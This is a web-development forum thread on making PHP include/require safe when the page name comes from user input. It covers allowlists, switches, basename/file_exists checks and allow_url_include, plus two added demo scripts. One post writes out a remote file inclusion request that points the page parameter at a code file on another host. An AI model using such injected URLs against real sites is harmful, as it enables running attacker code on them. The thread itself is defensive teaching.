MakeWebGames

Include "...."


furn355


It's only insecure if you're allowing user input to include a page, in which case there are a number of ways to verify the page is valid..

1) Switches.. (Quick and easy for small numbers of pages)

if( isset( $_GET['page'] ) )
{
   switch( $_GET['page'] )
   {
       case 'page1': include( 'path/to/page1.php' ); break;
       case 'page2': include( 'path/to/page2.php' ); break;
       default: include( 'index.php' );
   }
}

 

2) List the valid pages in an array...

if( isset( $_GET['page'] ) )
{
   $pages = array( 'page1', 'page2', 'page3' );
   if( in_array( $_GET['page'], $pages ) ) {
       include( $_GET['page'] .'.php' );
   } else {
       include( 'index.php' );
   }
}

 

3) The file_exists way.. Put all pages that are allowed to be included by user input into a separate dir..

if( isset( $_GET['page'] ) && is_string( $_GET['page'] ) )
{
   // basename() drops any directory part, so the path cannot leave the allowed dir
   $page = basename( $_GET['page'] );
   if( file_exists( 'path/to/allowed/pages/'. $page .'.php' ) ) {
       include( 'path/to/allowed/pages/'. $page .'.php' );
   } else {
       include( 'index.php' );
   }
}

 

Does this clear up your confusion? Includes/Requires are a very important part of PHP. As I said, they're only insecure if you do not validate a page which is being called in via user input, or by placing the page to include as a param in the web address. (example.com?page=pagename) :thumbup:

Link to comment
Share on other sites

require is the only alternative i think

They're the same and share the same need of user input validation.. The only difference is that Require() spits out an E_ERROR if the file doesn't exist.

Both of them are only insecure if you're allowing user input to include a page and you fail to validate them.

Link to comment
Share on other sites

It was to my understanding, if someone is using say :

include "globals.php";

I could make a text file which included the insides of global.php on another server which would also contain a function of some variety to achieve my means,

then run something like :

http://domain/index.php?page=http://domain2/code.txt

where his script would then run? :S No?

Link to comment
Share on other sites

It was to my understanding, if someone is using say :

include "globals.php";

I could make a text file which included the insides of global.php on another server which would also contain a function of some variety to achieve my means,

then run something like :

http://domain/index.php?page=http://domain2/code.txt

where his script would then run? :S No?

If I remember correctly, this can only happen if you have something like "allow_url_include" or some similar setting in PHP INI enabled, by default, it should be disabled for security

If you wish to test, try and include a page on your own server but include the full address "http://www.yoursite.com/globals.php" you "should" get something like

 

Warning: include() [function.include]: http:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\xampp\htdocs\temp\prev0~.php on line 9

Warning: include(http://www.google.com/globals.php) [function.include]: failed to open stream: no suitable wrapper could be found in C:\xampp\htdocs\temp\prev0~.php on line 9

Warning: include() [function.include]: Failed opening 'http://www.google.com/globals.php' for inclusion (include_path='.;C:\xampp\php\PEAR') in C:\xampp\htdocs\temp\prev0~.php on line 9

Tested on google..

Link to comment
Share on other sites
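
An added example, not part of any post in the thread: one function that applies the array allowlist from the first post, then confirms with realpath() that the resolved file sits inside the pages directory, and finally reports the allow_url_include setting discussed just above. resolve_page(), the temporary directory and the sample inputs are constructed for the demo.

```php
<?php
// Added example, not from the thread. resolve_page() is a hypothetical helper name.
function resolve_page($requested, $baseDir, array $allowed)
{
    // $_GET values can be arrays (?page[]=x); accept strings only, compared strictly.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    // realpath() returns false for a missing file and resolves ../ and symlinks,
    // so the prefix test below confirms the file really lives under $base.
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway pages directory so the script runs stand-alone.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/page1.php', '<?php echo "page1\n";');

$allowed = array('page1', 'page2'); // page2 is listed but its file does not exist
$inputs  = array('page1', 'page2', '../page1', 'http://domain2/code.txt', array('page1'));
foreach ($inputs as $input) {
    $path = resolve_page($input, $dir, $allowed);
    echo json_encode($input), ' => ',
         ($path === null ? 'default page' : 'include ' . basename($path)), "\n";
}

// With allow_url_include off, include() refuses http:// paths, as in the warnings above.
echo 'allow_url_include = ', var_export(ini_get('allow_url_include'), true), "\n";

unlink($dir . '/page1.php');
rmdir($dir);
```

Only the first input resolves to a file; every other request falls through to the default page, which is what the `else` branches in the posted snippets do.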

I use something very like this

if( isset( $_GET['page'] ) ) {
   $pages = array( 'page1', 'page2', 'page3' );
   if( in_array( $_GET['page'], $pages ) ) {
       include( $_GET['page'] .'.php' );
   } else {
       include( 'index.php' );
   }
}

but mine's more like

$file_array = array(
    'files/file1.php',
    'files/file2.php'
);
// Keep the request only when it exactly matches a listed path, otherwise use the default
$_GET['page'] = ( isset($_GET['page']) && in_array($_GET['page'], $file_array, true) ) ? $_GET['page'] : 'files/file1.php';
# File Inclusion (Start)
foreach ( $file_array as $value ) {
    if ( $_GET['page'] === $value ) {
        include_once( dirname(__FILE__) . '/' . $value );
    }
}
# File Inclusion (End)

This may not work; I edited it, since I'm not giving out my entire index.php file (basically 50 lines in my index file).

Link to comment
Share on other sites

Okay so we all know include is not secure.

I didn't know that ?

With $_GET, I use the switch statement that LordDan provided simple to add new rules and actions.

I don't think you can Include a file from another server simply using include and http:// ... because the server will try to find it locally.

Link to comment
Share on other sites

I use something very like this

if( isset( $_GET['page'] ) ) {
   $pages = array( 'page1', 'page2', 'page3' );
   if( in_array( $_GET['page'], $pages ) ) {
       include( $_GET['page'] .'.php' );
   } else {
       include( 'index.php' );
   }
}

but mine's more like

$file_array = array(
    'files/file1.php',
    'files/file2.php'
);
// Keep the request only when it exactly matches a listed path, otherwise use the default
$_GET['page'] = ( isset($_GET['page']) && in_array($_GET['page'], $file_array, true) ) ? $_GET['page'] : 'files/file1.php';
# File Inclusion (Start)
foreach ( $file_array as $value ) {
    if ( $_GET['page'] === $value ) {
        include_once( dirname(__FILE__) . '/' . $value );
    }
}
# File Inclusion (End)

This may not work; I edited it, since I'm not giving out my entire index.php file (basically 50 lines in my index file).

Zero Again? :P no need for the foreach() -.-

Here maybe? :P

$pages = array
(
        'explore' => 'city',
        'home'    => 'index'
);
$keys  = array_keys($pages);
// Keys are lowercase so the strtolower()'d request matches them; the i flag accepts any case
// and D stops $ from matching before a trailing newline.
$page = isset($_GET['page']) && is_string($_GET['page']) && preg_match("`^((". implode(")|(", $keys) ."))$`iD", $_GET['page']) ? strtolower($_GET['page']) : array_shift($keys);
include dirname(__FILE__) .'/'. $pages[$page] .'.php';

:O?

Link to comment
Share on other sites

my array is a little more complex

$example_array = array(
    'file1' => 'file1.php',
    'file2' => 'file2.php'
);

then later i use something similar to what i coded up a long time ago on here to grab the title name from page _GET then strip any unwanted characters and put into the right places. It's actually quite an amazing little setup.

Link to comment
Share on other sites

  • 2 weeks later...

You use __FILE__ to help in this kind of situation:

You call file1.php, which has a line to include 'subfolder/file2.php'.

file2.php also has a line to include 'file3.php'.

Now, where will PHP look for file3.php? In the root folder, since that is where file1.php is, or inside subfolder/, since that is where file2.php is?

When you have lots of includes in many different folders, this can get very confusing and you could make many mistakes, or even make your entire file system unusable in your script.

 

You can be consistent with includes if you use DIRNAME(__FILE__): it will always include the file from the same folder as the included file. So in this situation, it will include 'subfolder/file3.php'.

Link to comment
Share on other sites
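
The file1/file2/file3 situation from the post above as a runnable script, added here and not written by the poster. It shows that a bare include is resolved through include_path and the working directory, while dirname(__FILE__) pins the include to the including file's own folder, so which file executes no longer depends on where the request started. The temporary directory and the file contents are constructed for the demo.

```php
<?php
// Added example, not from the thread; the directory layout is constructed for the demo.
$root = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($root . '/subfolder', 0700, true);

// Two different file3.php files, so the result shows which one each include picked.
file_put_contents($root . '/file3.php', '<?php return "root/file3.php";');
file_put_contents($root . '/subfolder/file3.php', '<?php return "subfolder/file3.php";');

// file2.php pulls in file3.php twice: by bare name, and anchored to its own folder.
file_put_contents($root . '/subfolder/file2.php', '<?php
return array(
    "bare"     => (include "file3.php"),
    "anchored" => (include dirname(__FILE__) . "/file3.php"),
);');
file_put_contents($root . '/file1.php', '<?php return (include "subfolder/file2.php");');

// Simulate a request for file1.php: the working directory is the root folder
// and include_path holds only ".", i.e. the working directory.
chdir($root);
set_include_path('.');
$picked = include $root . '/file1.php';

foreach ($picked as $style => $file) {
    echo str_pad($style, 9), '=> ', $file, "\n";
}

// Leave the demo directory before deleting it, then clean up the constructed files.
chdir(sys_get_temp_dir());
foreach (array('/file1.php', '/file3.php', '/subfolder/file2.php', '/subfolder/file3.php') as $f) {
    unlink($root . $f);
}
rmdir($root . '/subfolder');
rmdir($root);
```

The bare include picks up the root folder's file3.php because the working directory is searched first; the anchored include always gets subfolder/file3.php.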
